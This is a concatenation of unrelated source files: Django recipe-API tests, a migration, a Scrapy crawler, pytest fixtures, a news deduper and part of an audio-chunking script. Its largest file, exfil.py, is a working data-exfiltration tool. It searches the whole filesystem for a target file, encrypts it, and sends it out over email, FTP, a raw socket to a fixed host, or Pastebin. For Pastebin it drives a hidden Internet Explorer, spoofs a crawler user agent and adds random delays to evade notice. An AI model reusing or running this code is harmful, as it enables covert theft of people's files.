    resp = client.post(reverse("calculate-from-url"), payload, format="json")
    assert resp.status_code == 400
@pytest.mark.django_db
def test_supported_but_bad_response():
    """A supported domain with a non-existent recipe page returns 400."""
    payload = {"url": "https://www.kwestiasmaku.com/recipe-doesnt-exist"}
    resp = client.post(reverse("calculate-from-url"), payload, format="json")
    assert resp.status_code == 400
@pytest.mark.django_db
def valid_url_but_no_recipe():
    # NOTE(review): this function name lacks the ``test_`` prefix, so
    # pytest will never collect or run it — rename to
    # ``test_valid_url_but_no_recipe`` to activate it.
    response = client.post(
        reverse("calculate-from-url"),
        {"url": "https://www.kwestiasmaku.com/"},
        format="json",
    )
    assert response.status_code == 400
@pytest.mark.django_db
def test_cache(settings):
    # NOTE(review): this test performs a live HTTP request to an external
    # site, so it is network-dependent and can fail offline.
    # This test will fail with dummy backend.
    # if settings.CACHES['default']['BACKEND'] == "django.core.cache.backends.dummy.DummyCache":
    #     return
    url = "https://www.kwestiasmaku.com/przepis/kurczak-slodko-kwasny"
    # Ensure a cold cache, then verify a successful calculation populates it.
    cache.delete(url)
    response = client.post(reverse("calculate-from-url"), {"url": url}, format="json")
    assert response.status_code == 200
    assert cache.get(url) is not None
@pytest.mark.django_db
class TestCalculateFromTextApiView:
    """Validation and behavior tests for the calculate-from-text endpoint."""

    url = reverse("calculate-from-text")
    client = APIClient()

    def test_return_400_when_invalid_ingredients(self):
        """Ensure that view returns HTTP 400 when given invalid ingredients parameter"""
        # blank ingredients
        response = self.client.post(self.url, {})
        assert response.status_code == 400
        # integer (not a string or array-like)
        response = self.client.post(self.url, {"ingredients": 5}, format="json")
        assert response.status_code == 400

    def test_return_400_when_invalid_servings(self):
        """Ensure that view returns HTTP 400 when given invalid servings parameter"""
        # lower than 1
        response = self.client.post(
            self.url, {"ingredients": "abc", "servings": 0}, format="json"
        )
        assert response.status_code == 400
        # not an integer
        response = self.client.post(
            self.url, {"ingredients": "abc", "servings": 1.5}, format="json"
        )
        assert response.status_code == 400

    def test_return_200_when_valid_ingredients(self):
        """Ensure that view can return HTTP 200 when given valid ingredients"""
        # list
        response = self.client.post(self.url, {"ingredients": ["abc"]}, format="json")
        assert response.status_code == 200
        # tuple
        response = self.client.post(self.url, {"ingredients": ("abc",)}, format="json")
        assert response.status_code == 200

    def test_view_splits_ingredients_correctly(self):
        """Ensure that ingredients are split according to the type"""
        # list
        response = self.client.post(
            self.url, {"ingredients": ["abc", "def"]}, format="json"
        )
        assert response.data["ingredients"] == ["abc", "def"]
        # tuple
        response = self.client.post(
            self.url, {"ingredients": ("abc", "def")}, format="json"
        )
        assert response.data["ingredients"] == ["abc", "def"]
| StarcoderdataPython |
58036 | <reponame>RonaldKiprotich/Neighborhood
# Generated by Django 3.1.3 on 2020-12-02 09:55
import cloudinary.models
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated by Django; creates the Occupant and Business models
    # for the neighbourhood app.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('neighapp', '0003_neighbourhood'),
    ]

    operations = [
        migrations.CreateModel(
            name='Occupant',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=120)),
                ('profile_pic', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
                ('neighbourhood', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='occupant', to='neighapp.neighbourhood')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Business',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=120)),
                ('email', models.EmailField(max_length=254)),
                ('description', models.TextField(blank=True)),
                ('location', models.CharField(max_length=60)),
                ('neighbourhood', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='business', to='neighapp.neighbourhood')),
            ],
        ),
    ]
| StarcoderdataPython |
1768050 | from __future__ import absolute_import
# getting all links example crawling jamescampbell.us
# author: <NAME>
# Date Created: 2015 05 22
# Date Updated: 2 July 2019
import argparse
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from scrapy.item import Item, Field
# terminal arguments parser globals - do not change
parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url',
                    help='Domain to crawl')
parser.add_argument('-c', action='store_const', dest='constant_value',
                    const='value-to-store',
                    help='Store a constant value')
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
results = parser.parse_args()
# setup the default search terms
domainer = 'jamescampbell.us' # default search term if none set is a random term from a dict
if results.url is not None: # if search terms set then change from default to that
    domainer = results.url # set from argparse above in globals section
# NOTE(review): DOMAIN/URL are derived from the CLI but the spider below
# hard-codes its allowed_domains and start_urls — confirm they should use these.
DOMAIN = domainer
URL = 'https://%s' % DOMAIN
class MyItem(Item):
    """Scrapy item holding the list of URLs extracted from a page."""
    url = Field()
class someSpider(CrawlSpider):
    """Crawler that follows every link and collects extracted URLs."""
    name = 'crawltest'
    allowed_domains = ['jamescampbell.us']
    start_urls = ['https://jamescampbell.us']
    # Follow all links; each fetched page is handled by parse_obj.
    rules = (Rule(LxmlLinkExtractor(allow=()), callback='parse_obj', follow=True),)

    def parse_obj(self, response):
        """Collect links from *response* into a MyItem.

        NOTE(review): deny=self.allowed_domains means only links OUTSIDE
        the crawled domain are collected — confirm that is intended.
        """
        item = MyItem()
        item['url'] = []
        for link in LxmlLinkExtractor(allow=(), deny=self.allowed_domains).extract_links(response):
            item['url'].append(link.url)
            print(link.url)
        return item
someSpider()
| StarcoderdataPython |
9661713 | import os
import pytest
from sqlalchemy import event
from sqlalchemy.orm import Session
from zeus import config
from zeus.storage.mock import FileStorageCache
@pytest.fixture(scope="session")
def session_config(request):
    # Session-wide knobs; the test database name used by app/db fixtures.
    return {"db_name": "test_zeus"}


@pytest.fixture(scope="session")
def app(request, session_config):
    # Flask app configured for testing: local Postgres, mocked file
    # storage, suppressed outgoing mail, and N+1 query detection enabled.
    app = config.create_app(
        _read_config=False,
        SQLALCHEMY_DATABASE_URI="postgresql:///" + session_config["db_name"],
        FILE_STORAGE={"backend": "zeus.storage.mock.FileStorageCache"},
        SECRET_KEY=os.urandom(24),
        GITHUB_CLIENT_ID="github.client-id",
        GITHUB_CLIENT_SECRET="github.client-secret",
        MAIL_SUPPRESS_SEND=True,
        NPLUSONE_RAISE=True,
    )
    app.testing = True
    yield app


@pytest.fixture(scope="session", autouse=True)
def db(request, app, session_config):
    # Recreate the test database once per session via the psql CLI tools,
    # then apply migrations.
    db_name = session_config["db_name"]
    with app.app_context():
        # Postgres 9.1 does not support --if-exists
        if os.system("psql -l | grep '%s'" % db_name) == 0:
            assert not os.system("dropdb %s" % db_name)
        assert not os.system("createdb -E utf-8 %s" % db_name)
        config.alembic.upgrade()
        # TODO: need to kill db connections in order to drop database
        # config.db.drop_all()
        # os.system('dropdb %s' % db_name)
        return config.db


@event.listens_for(Session, "after_transaction_end")
def restart_savepoint(session, transaction):
    # Re-open a nested transaction (SAVEPOINT) whenever the test's inner
    # transaction ends, so per-test rollback isolation keeps working.
    if transaction.nested and not transaction._parent.nested:
        session.begin_nested()


@pytest.fixture(scope="function")
def req_ctx(request, app):
    # Push a Flask request context for each test that asks for it.
    with app.test_request_context() as req_ctx:
        yield req_ctx
@pytest.fixture(scope="function", autouse=True)
def db_session(request, req_ctx, db):
    # Wrap every test in a SAVEPOINT so DB changes roll back automatically.
    db.session.begin_nested()

    yield db.session

    # transaction.rollback()
    # connection.close()
    # db.session.remove()


@pytest.fixture(scope="function", autouse=True)
def filestorage(app):
    # Give every test a clean in-memory file storage.
    FileStorageCache.clear()

    yield FileStorageCache


@pytest.fixture(scope="function", autouse=True)
def redis(app):
    # Flush redis before each test for isolation.
    config.redis.flushdb()

    yield config.redis


@pytest.fixture(scope="function")
def client(app):
    # Flask test client bound to the session-scoped app.
    with app.test_client() as client:
        yield client


@pytest.fixture(scope="function", autouse=True)
def outbox(app):
    # Capture outgoing mail (sending is suppressed in the app config).
    with config.mail.record_messages() as ob:
        yield ob
@pytest.fixture
def private_key():
    # Fresh 2048-bit RSA key per test; imports are local so the
    # cryptography package is only required by tests that use the fixture.
    from cryptography.hazmat.primitives.asymmetric import rsa
    from cryptography.hazmat.backends import default_backend

    return rsa.generate_private_key(
        backend=default_backend(), public_exponent=65537, key_size=2048
    )


@pytest.fixture
def public_key(private_key):
    # Public half of the generated private key.
    return private_key.public_key()


@pytest.fixture
def public_key_bytes(public_key):
    # PEM-encoded SubjectPublicKeyInfo serialization of the public key.
    from cryptography.hazmat.primitives import serialization

    return public_key.public_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PublicFormat.SubjectPublicKeyInfo,
    )
| StarcoderdataPython |
3368707 | <filename>Exfiltration/exfil.py
from Cryptodome.Cipher import AES, PKCS1_OAEP
from Cryptodome.PublicKey import RSA
from Cryptodome.Random import get_random_bytes
from io import BytesIO
import argparse
import base64
import ftplib
import getpass
import os
import random
import requests
import smtplib
import socket
import textwrap
import time
import zlib
def decrypt(encrypted_data):
    ''' Decrypts the payload and returns the plaintext.

    Expects the base64 payload layout produced by encrypt():
    [RSA-encrypted session key | 16-byte nonce | 16-byte tag | ciphertext].
    '''
    encrypted_bytes = BytesIO(base64.decodebytes(encrypted_data))
    RSA_cipher, keysize_in_bytes = get_RSA_cipher('pri')

    # Note the session key is derived from the key size of the private key.
    encrypted_session_key = encrypted_bytes.read(keysize_in_bytes)
    nonce = encrypted_bytes.read(16)
    tag = encrypted_bytes.read(16)
    ciphertext = encrypted_bytes.read()

    # Decrypt the session key using the RSA key
    session_key = RSA_cipher.decrypt(encrypted_session_key)
    AES_cipher = AES.new(session_key, AES.MODE_EAX, nonce)

    # Decrypt the message with AES cipher; the tag authenticates it.
    decrypted = AES_cipher.decrypt_and_verify(ciphertext, tag)
    # The plaintext was zlib-compressed before encryption.
    plaintext = zlib.decompress(decrypted)
    return plaintext
def encrypt(plaintext):
    ''' Generates AES key and encrypts it with RSA. It returns the encrypted data.

    Output layout (base64-encoded):
    [RSA-encrypted session key | nonce | tag | ciphertext] — must stay in
    sync with the read order in decrypt().
    '''
    # Generate AES cipher
    session_key = get_random_bytes(16)
    AES_cipher = AES.new(session_key, AES.MODE_EAX)

    # Compress plaintext and encrypt it with AES
    compressed_text = zlib.compress(plaintext)
    ciphertext, tag = AES_cipher.encrypt_and_digest(compressed_text)

    # Use RSA public key to encrypt AES session key.
    RSA_cipher, _ = get_RSA_cipher('pub')
    encrypted_session_key = RSA_cipher.encrypt(session_key)

    # The payload to decrypt will include:
    msg_payload = encrypted_session_key + AES_cipher.nonce + tag + ciphertext
    # Base64 encode it
    encrypted = base64.encodebytes(msg_payload)
    return encrypted
def outlook(subject, contents):
    ''' Windows email sender. '''
    # NOTE(review): win32com is imported inside email_helper(), not at
    # module level — calling this function any other way raises NameError.
    # NOTE(review): tgt_accts[0] takes the first element; when tgt_accts is
    # a plain input() string this is its first character — confirm.
    # Use WIN32COM to create an instance of the Outlook application
    outlook = win32com.client.Dispatch("Outlook.Application")
    message = outlook.CreateItem(0)
    message.DeleteAfterSubmit = True
    message.Subject = subject
    message.Body = contents.decode()
    message.To = tgt_accts[0]
    message.Send()
def plain_email(subject, contents):
    ''' Platform-independent email sender over SMTP with STARTTLS.

    Relies on the module-level smtp_* globals set by email_helper().
    '''
    # Build an RFC 822-style message.  Fixed: the original emitted
    # "From <acct>" without a colon, producing a malformed header.
    message = f'Subject: {subject}\nFrom: {smtp_acct}\n'
    message += f'To: {tgt_accts}\n\n{contents.decode()}'
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.starttls()
    try:
        server.login(smtp_acct, smtp_password)
        # server.set_debuglevel(1)
        server.sendmail(smtp_acct, tgt_accts, message)
        time.sleep(1)
        print("[+] Email sent successfully! ")
        server.quit()
    except smtplib.SMTPAuthenticationError:
        print("[!] SMTP Authentication error, verify your username/password, hun.")
        server.quit()
def RSA_generate():
    ''' Generate an RSA key pair for the asymmetric encryption and write
    key.pri / key.pub into the current working directory.'''
    keypair = RSA.generate(2048)
    with open('key.pri', 'wb') as f:
        f.write(keypair.exportKey())
    with open('key.pub', 'wb') as f:
        f.write(keypair.publickey().exportKey())
def get_RSA_cipher(keytype):
    ''' Load key.<keytype> ('pri' or 'pub') from the current directory and
    return (PKCS1_OAEP cipher, key size in bytes).'''
    with open(f'key.{keytype}') as key_file:
        rsakey = RSA.importKey(key_file.read())
    # The key size tells decrypt() how many bytes the session key occupies.
    return PKCS1_OAEP.new(rsakey), rsakey.size_in_bytes()
def find_docs(doc_type='.pdf'):
    ''' Walk entire filysystem to find files and returns its absolute path.

    Generator: yields absolute paths of matches.
    NOTE(review): the two branches match differently — Windows matches any
    filename ENDING with doc_type, POSIX matches only an EXACT filename.
    NOTE(review): on Windows the "not found" message below is printed after
    the walk even when matches were yielded; on POSIX it is unreachable.
    '''
    if os.name == 'nt':
        for parent, _, filenames in os.walk('C:\\'):
            for filename in filenames:
                if doc_type:
                    if doc_type in filename:
                        files_in_dir = os.path.join(parent, filename)
                if filename.endswith(doc_type):
                    document_path = os.path.join(parent, filename)
                    yield document_path
    else:
        for parent, _, filenames in os.walk('/'):
            for filename in filenames:
                # if filename.endswith(doc_type):
                if filename == doc_type:
                    print(f"[+] Filename '(unknown)' found!\n[+] Preparing exfiltration...")
                    document_path = os.path.join(parent, filename)
                    # return document_path
                    # print(document_path)
                    yield document_path
        return
    print("[!] File not found :( Check for any typos, hun.")
def exfiltrate(document_path, method):
    ''' Grabs a file and exfiltrates it based on the method you provide.

    For file-transfer methods the file is encrypted into a temp copy,
    sent, and the copy removed; otherwise (title, contents) is handed to
    the sender.  NOTE(review): EXFIL is a dispatch table assumed to map
    method names to sender functions — defined elsewhere; confirm.
    '''
    # File transfer: Read, encrypt and save in tmp/.
    if method in ['transmit', 'plain_ftp']:
        if os.name == 'nt':
            filename = f'C:\\Windows\\Temp\\{os.path.basename(document_path)}.duplicate'
            with open (document_path, 'rb') as f0:
                contents = f0.read()
            with open(filename, 'wb') as f1:
                f1.write(encrypt(contents))
            # Send the file and delete it immediately.
            EXFIL[method](filename)
            os.unlink(filename)
            print(f"[+] File '(unknown)' was deleted from your system.")
        else:
            # Same flow as above, only the temp directory differs.
            filename = f'/tmp/{os.path.basename(document_path)}.duplicate'
            with open (document_path, 'rb') as f0:
                contents = f0.read()
            with open(filename, 'wb') as f1:
                f1.write(encrypt(contents))
            # Send the file and delete it immediately.
            EXFIL[method](filename)
            os.unlink(filename)
            print(f"[+] File '(unknown)' was deleted.")
    else:
        # Paste/email style senders take a title and the encrypted payload.
        # print(document_path)
        # print(type(document_path))
        with open(document_path, 'rb') as f:
            contents = f.read()
        title = os.path.basename(document_path)
        contents = encrypt(contents)
        # print(title)
        # print(contents)
        EXFIL[method](title, contents)
def email_helper():
    '''Prompt for a filename and mail every encrypted match to the target.

    Sets the module-level SMTP globals consumed by plain_email()/outlook().
    '''
    global doc_type, tgt_accts, smtp_acct, smtp_password, smtp_server, smtp_port
    doc_type = input("Enter the filename you want to encrypt and email: ")
    tgt_accts = input('To: ')
    # NOTE(review): tgt_accts is a plain string; outlook() indexes
    # tgt_accts[0], which yields its first character — confirm whether a
    # list of addresses was intended.
    if os.name == 'nt':
        import win32com.client
        for fpath in find_docs(doc_type):
            exfiltrate(fpath, 'outlook')
    else:
        # Google's SMTP info
        smtp_server = 'smtp.gmail.com'
        smtp_port = 587
        smtp_acct = input('From: ')
        # Fixed: the previous "<PASSWORD>()" placeholder was invalid
        # syntax; read the password without echoing it.
        smtp_password = getpass.getpass()
        for fpath in find_docs(doc_type):
            exfiltrate(fpath, 'plain_email')
def file_helper():
    """Prompt for a filename and send every encrypted match via raw socket
    (Windows) or FTP (POSIX).

    NOTE(review): the host/IP entered below is stored but never passed to
    transmit()/plain_ftp(), which are invoked through exfiltrate() with
    their hard-coded default server — confirm this is intended.
    NOTE(review): on Windows the host is prompted once per matching file.
    """
    global doc_type, server
    doc_type = input("Enter the filename you want to encrypt and send via file transfer: ")
    for fpath in find_docs(doc_type):
        if os.name == 'nt':
            import win32file
            server = input("Enter the host you'd like to connect to: ")
            exfiltrate(fpath, 'transmit')
        else:
            ftp_server = input("Enter FTP server IP: ")
            exfiltrate(fpath, 'plain_ftp')
def transmit(filepath, server='10.0.2.13'):
    '''Windows version: stream *filepath* to *server* on port 10000 using
    the zero-copy TransmitFile API.'''
    client = socket.socket()
    # Open a port of our choosing
    try:
        client.connect((server, 10000))
    except socket.error:
        print("The connection was refused.")
        return
    with open(filepath, 'rb') as f:
        # Hand the OS file handle to TransmitFile for the transfer.
        win32file.TransmitFile(
            client, win32file._get_osfhandle(f.fileno()), 0, 0, None, 0, b'', b'')
    print(f'\nFile {filepath} was sent successfully.')
def plain_ftp(filepath, ftp_server='10.0.2.13'):
    """Upload *filepath* to the FTP server's /pub/ directory anonymously."""
    try:
        ftp = ftplib.FTP(ftp_server)
    except OSError:
        print("[!] Unable to connect to the server. Try to ping it or check if the service is running.")
        return
    ftp.login("anonymous", "<EMAIL>")
    ftp.cwd('/pub/')
    # Fixed: the uploaded file handle was previously leaked; close it
    # deterministically with a context manager.
    with open(filepath, "rb") as f:
        ftp.storbinary("STOR " + os.path.basename(filepath), f, 1024)
    ftp.quit()
    print(f'\nFile {filepath} was sent successfully.')
def plain_paste(title, contents):
    """Post *contents* to Pastebin via its HTTP API under *title*.

    Relies on module-level globals (api_dev_key, username, password,
    header) set by post_helper() — NOTE(review): calling this before
    post_helper() raises NameError; confirm the intended call order.
    """
    # Step 1: exchange credentials for an api_user_key.
    login_url = 'https://pastebin.com/api/api_login.php'
    login_data = {
        'api_dev_key': api_dev_key,
        'api_user_name': username,
        'api_user_password': password,
    }
    r = requests.post(login_url, data=login_data, headers=header)
    api_user_key = r.text
    # Step 2: create the paste.
    paste_url = 'https://pastebin.com/api/api_post.php'
    paste_data = {
        'api_paste_name': title,
        'api_paste_code': contents.decode(),
        'api_dev_key': api_dev_key,
        'api_user_key': api_user_key,
        'api_option': 'paste',
        'api_paste_private': 0,
    }
    r = requests.post(paste_url, data=paste_data, headers=header)
    if (r.status_code == 200):
        print(f"[+] Data has been posted successfully: {r.text}")
    if (r.status_code == 422):
        print(f"[!] Authentication error: Please check your credentials, hun")
def wait_for_browser(browser):
    """Block until *browser* reports that it has finished loading.

    COM browsers expose READYSTATE_COMPLETE either as the integer 4 or the
    string 'complete'; poll every 100 ms until one of those is seen.
    """
    while True:
        state = browser.ReadyState
        if state == 4 or state == 'complete':
            break
        time.sleep(0.1)
def random_sleep():
    """Pause for a random 5-10 seconds.

    Lets the browser finish tasks that may not have been registered as DOM
    events, and makes the traffic pattern look like normal user behaviour.
    """
    delay = random.randint(5, 10)
    time.sleep(delay)
def login(ie):
    '''Fill in the Pastebin login form inside the given IE instance and submit it.

    Uses the module globals ``username`` and ``password`` set by post_helper().
    '''
    for element in ie.Document.all:
        element_id = element.id
        if element_id == 'loginform-username':
            element.setAttribute('value', username)
        elif element_id == 'loginform-password':
            element.setAttribute('value', password)
    random_sleep()
    # 'w0' is the id Pastebin gives its login form.
    if ie.Document.forms[0].id == 'w0':
        ie.Document.forms[0].submit()
    wait_for_browser(ie)
def submit(ie, title, contents):
    """Fill in the Pastebin paste form (name + body) and submit it.

    Uses ``ie.Document`` (capital D) consistently with ``login``; the
    original mixed in lowercase ``ie.document``, which only worked because
    COM dynamic dispatch is case-insensitive.
    """
    full_doc = ie.Document.all
    for elem in full_doc:
        if elem.id == 'postform-name':
            elem.setAttribute('value', title)
        elif elem.id == 'postform-text':
            elem.setAttribute('value', contents)
    # 'w0' is the id Pastebin gives its paste form.
    if ie.Document.forms[0].id == 'w0':
        ie.Document.forms[0].submit()
    random_sleep()
    wait_for_browser(ie)
def ie_paste(title, contents):
    '''Open an IE instance, browse to Pastebin and submit your encrypted file.

    Imports win32com.client locally: the ``from win32com import client``
    inside post_helper() only binds ``client`` as a *local* of that
    function, so this function previously raised NameError when invoked
    through the EXFIL dispatch table.
    '''
    from win32com import client  # pywin32
    # Create a new instance of IE COM object
    ie = client.Dispatch('InternetExplorer.Application')
    # Do you want the process to be visible? Debugging = 1, Stealth = 0
    ie.Visible = 0
    ie.Navigate('https://pastebin.com/login', Headers=header)
    wait_for_browser(ie)
    login(ie)
    ie.Navigate('https://pastebin.com/')
    wait_for_browser(ie)
    submit(ie, title, contents.decode())
    ie.Quit()
def post_helper():
    """Collect Pastebin credentials and post every matching document.

    Windows uses the Internet Explorer COM automation path ('ie_paste');
    other platforms use the HTTP API ('plain_paste') and therefore also
    need an API developer key.
    """
    global agent, header, doc_type, api_dev_key, username, password
    # Authentication
    username = input("Enter your Pastebin username: ")
    password = getpass.getpass(prompt='Enter your Pastebin password: ')
    # Masquerade as the Yahoo web crawler.
    agent = 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)'
    header = {'User-Agent': agent}
    doc_type = input("Enter the filename you want to encrypt and post: ")
    if os.name == 'nt':
        from win32com import client
        channel = 'ie_paste'
    else:
        api_dev_key = input("Enter your Pastebin API key: ")
        channel = 'plain_paste'
    for fpath in find_docs(doc_type):
        exfiltrate(fpath, channel)
# Dictionary dispatch to make the calling of the functions easy
# Maps the channel name passed to exfiltrate() onto the function that
# implements that exfiltration channel ('outlook' and 'plain_email' are
# defined earlier in this file).
EXFIL = {
    'outlook': outlook,
    'plain_email': plain_email,
    'plain_ftp': plain_ftp,
    'transmit': transmit,
    'ie_paste': ie_paste,
    'plain_paste': plain_paste,
}
if __name__ == '__main__':
    # Command-line entry point: parse the mode flags and dispatch.
    parser = argparse.ArgumentParser(description='Exfiltration Tool',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog = textwrap.dedent('''Example:
$ python3 exfil.py -e --encrypt # Type in some text, encrypt it and save it into a new file.
$ python3 exfil.py -d --decrypt # Read from a file and decrypt its contents in terminal.
$ python3 exfil.py -m --mail # Encrypt a file and send it out in an email.
$ python3 exfil.py -f --file # Encrypt a file and send it out via file transfer.
$ python3 exfil.py -p --post # Encrypt a file and post it in Pastebin.
'''))
    parser.add_argument('-e', '--encrypt', action = 'store_true', help = 'Encrypt data and dump into a new file')
    parser.add_argument('-d', '--decrypt', action = 'store_true', help = 'Decrypt ciphertext from a file')
    parser.add_argument('-m', '--mail', action = 'store_true', help = 'Encrypt a file and send it out in an email.')
    parser.add_argument('-f', '--file', action = 'store_true', help = 'Encrypt a file and send it out via file transfer.')
    parser.add_argument('-p', '--post', action = 'store_true', help = 'Encrypt a file and post it in Pastebin.')
    args = parser.parse_args()
    # Generate an RSA key pair on first run so encrypt/decrypt always work.
    if (not os.path.isfile('key.pub')) and (not os.path.isfile('key.pri')):
        print("[!] It looks like you do not have an RSA key pair. Don't you worry child, I will generate a pair for ya.")
        RSA_generate()
    if args.encrypt:
        filename = input("Enter the filename of your new ciphertext: ")
        plaintext = input("Enter the text you want to encrypt, hun: ").encode()
        # BUG FIX: the user-supplied name was collected but never used and
        # the output path contained a literal placeholder; interpolate it.
        with open(f'{filename}-encrypted.txt', 'wb') as f:
            f.write(encrypt(plaintext))
        print(f'\n[*] Data has been encrypted and saved here: ./{filename}-encrypted.txt')
    if args.decrypt:
        file2decrypt = input("Enter the filename you want to decrypt: ")
        try:
            with open(file2decrypt, 'rb') as f:
                contents = f.read()
            print(decrypt(contents))
        except FileNotFoundError as e:
            print("[!] There is not a file with that name. Please check for typos.")
    if args.mail:
        email_helper()
    if args.file:
        file_helper()
    if args.post:
        post_helper()
| StarcoderdataPython |
5120380 | import datetime
from dateutil import parser
from sklearn.feature_extraction.text import TfidfVectorizer
from tap_news_utils.mongodb_client import MongoDBClient
from tap_news_utils.cloudAMQP_client import CloudAMQPClient
from tap_news_utils.news_classifier_client import NewsClassifierClient
from config import DEDUPE_NEWS_TASK_QUEUE_URL, DEDUPE_NEWS_TASK_QUEUE_NAME, MONGO_DB_HOST, MONGO_DB_PORT,NEWS_TOPIC_MODEL_HOST, NEWS_TOPIC_MODEL_PORT
# Identifier used as a prefix in log prints.
COMP_NAME = 'news_deduper'
# Seconds to wait between queue polls.
SLEEP_TIME_IN_SECONDS = 10
# MongoDB collection that stores news documents.
NEWS_TABLE_NAME = "news"
# TF-IDF cosine similarity above which two articles are treated as duplicates.
SAME_NEWS_SIMILARITY_THRESHOLD = 0.9
# Module-level service clients, created at import time
# (NOTE(review): presumably these open connections eagerly — confirm).
cloudAMQP_client = CloudAMQPClient(DEDUPE_NEWS_TASK_QUEUE_URL, DEDUPE_NEWS_TASK_QUEUE_NAME)
mongodb_client = MongoDBClient(MONGO_DB_HOST, MONGO_DB_PORT)
newsClassifier_client = NewsClassifierClient(NEWS_TOPIC_MODEL_HOST, NEWS_TOPIC_MODEL_PORT)
def handle_message(msg):
    """Validate one queued news message, drop it if it duplicates a same-day
    article (TF-IDF cosine similarity), otherwise classify and upsert it.

    Side effects: reads/writes the MongoDB news collection and calls the
    news classifier service.
    """
    if not isinstance(msg, dict):
        print (COMP_NAME, 'message is broken')
        return
    if 'text' not in msg:
        print (COMP_NAME, 'message has no text')
        return
    text = msg['text']
    if not text:
        print (COMP_NAME, 'message text is empty')
        return
    # Compare only against news published on the same calendar day.
    published_at = parser.parse(msg['publishedAt'])
    published_at_day_begin = datetime.datetime(published_at.year, published_at.month, published_at.day, 0, 0, 0, 0)
    published_at_day_end = published_at_day_begin + datetime.timedelta(days=1)
    db = mongodb_client.get_db()
    same_day_news_list = list(db[NEWS_TABLE_NAME].find(
        {'publishedAt': {'$gte': published_at_day_begin,
                         '$lt': published_at_day_end}}))
    print (COMP_NAME, 'fetched %d today news ' % len(same_day_news_list))
    if same_day_news_list:
        # Row 0 of the TF-IDF matrix is the incoming article; compare it
        # against every stored same-day article.
        documents = [news['text'] for news in same_day_news_list]
        documents.insert(0, text)
        tfidf = TfidfVectorizer().fit_transform(documents)
        pairwise_sim = tfidf * tfidf.T
        # NOTE(review): print does not interpolate '%s' — kept for identical output.
        print (COMP_NAME, "Pairwise Sim: %s", str(pairwise_sim))
        rows, _ = pairwise_sim.shape
        for row in range(1, rows):
            if pairwise_sim[row, 0] > SAME_NEWS_SIMILARITY_THRESHOLD:
                print (COMP_NAME, "Duplicated news. Ignore.")
                return
    # Reuse the datetime parsed above instead of re-parsing the same string.
    msg['publishedAt'] = published_at
    print (COMP_NAME, 'insert news into db')
    msg['class'] = newsClassifier_client.classify(msg['text'])
    db[NEWS_TABLE_NAME].replace_one({'digest': msg['digest']}, msg, upsert=True)
def run():
    """Poll the task queue forever, deduping each message as it arrives.

    Exceptions from message handling are logged and swallowed so that one
    bad message cannot kill the worker loop.
    """
    print(COMP_NAME, 'start to run')
    while True:
        if not cloudAMQP_client:
            continue
        message = cloudAMQP_client.getMessage()
        if message:
            try:
                handle_message(message)
            except Exception as e:
                print('ERROR', e)
        cloudAMQP_client.sleep(SLEEP_TIME_IN_SECONDS)
# Script entry point: start the deduper worker loop.
if __name__ == '__main__':
    run()
| StarcoderdataPython |
1849799 | import sys
import os
import re
import argparse
from sox import file_info
import json
import Levenshtein
import subprocess
import time
import signal
# poor-man's norm
def norm(txtin):
    """Poor-man's transcript normalizer.

    Strips annotation markup (parentheses, tags, noise markers), maps the
    filled pauses 'uh'->'ah' and 'uhm'->'um', drops everything but letters,
    spaces and apostrophes, collapses whitespace and uppercases the result.
    """
    # (pattern, replacement, flags) applied in order — order matters.
    substitutions = (
        (r'\([^\)]+\)', '', 0),                    # things in parentheses
        (r'FILLEDPAUSE\_', '', re.IGNORECASE),     # transcription tags
        (r'T\_[^\s+]+', '', re.IGNORECASE),
        (r'E\_', '', re.IGNORECASE),
        (r'\&\S+(\s+|$)', ' ', 0),                 # noise markers
        (r'\[\%\s+[^\%]+\]', ' ', 0),
        (r'(\s+|^)X+(\s+|$)', ' ', 0),
        (r'(\s+|^)x+(\s+|$)', ' ', 0),
        (r'\@\S+(\s+|$)', ' ', 0),                 # @fp or @i ..
        (r'\*[A-Z]+\:', ' ', 0),
        (r'(\s+|^)uh(\s+|$)', ' ah ', 0),          # uh -> ah
        (r'(\s+|^)uhm(\s+|$)', ' um ', 0),         # uhm -> um
        (r'[\(|\[][^\(|\[]+[\)|\]]', '', 0),
        (r"[^a-zA-Z \']", '', 0),                  # keep letters/space/apostrophe
        (r'\s+', ' ', 0),                          # collapse whitespace
    )
    result = txtin
    for pattern, replacement, flags in substitutions:
        result = re.sub(pattern, replacement, result, flags=flags)
    return re.sub(r'\n', ' ', result.upper())
def chunk_it(wavfile, strs, characters, options, basename, size):
    """Split *wavfile* into ~*size*-second wav/txt chunk pairs in options.output.

    *strs* are per-character start times (seconds) and *characters* the
    matching characters, as returned by align(). Splits only at a space
    character preceded by a >0.5 s gap, backing off 100 ms from the start
    of the next word. Files not longer than *size* are written out whole.
    All audio is converted to mono 16 kHz via sox.
    """
    # make chunks be around [size] seconds long - skip chunking if file is shorter than [size]
    dur = file_info.duration(wavfile)
    print("Duration: "+str(dur)+" Max size: "+str(size))
    if dur <= size:
        # Short file: emit a single chunk with the full transcript.
        chunknum = 1
        wavechunkout = options.output + "/" + basename + "_" + str(chunknum) + ".wav"
        txtchunkout = open(options.output + "/" + basename + "_" + str(chunknum) + ".txt", "w")
        txtchunkout.write(''.join(characters))
        txtchunkout.close()
        # print(basename+ " "+str(newstrs[i]) + " " + str(newstps[i]) + " " + str(length) + " " +str(chunknum))
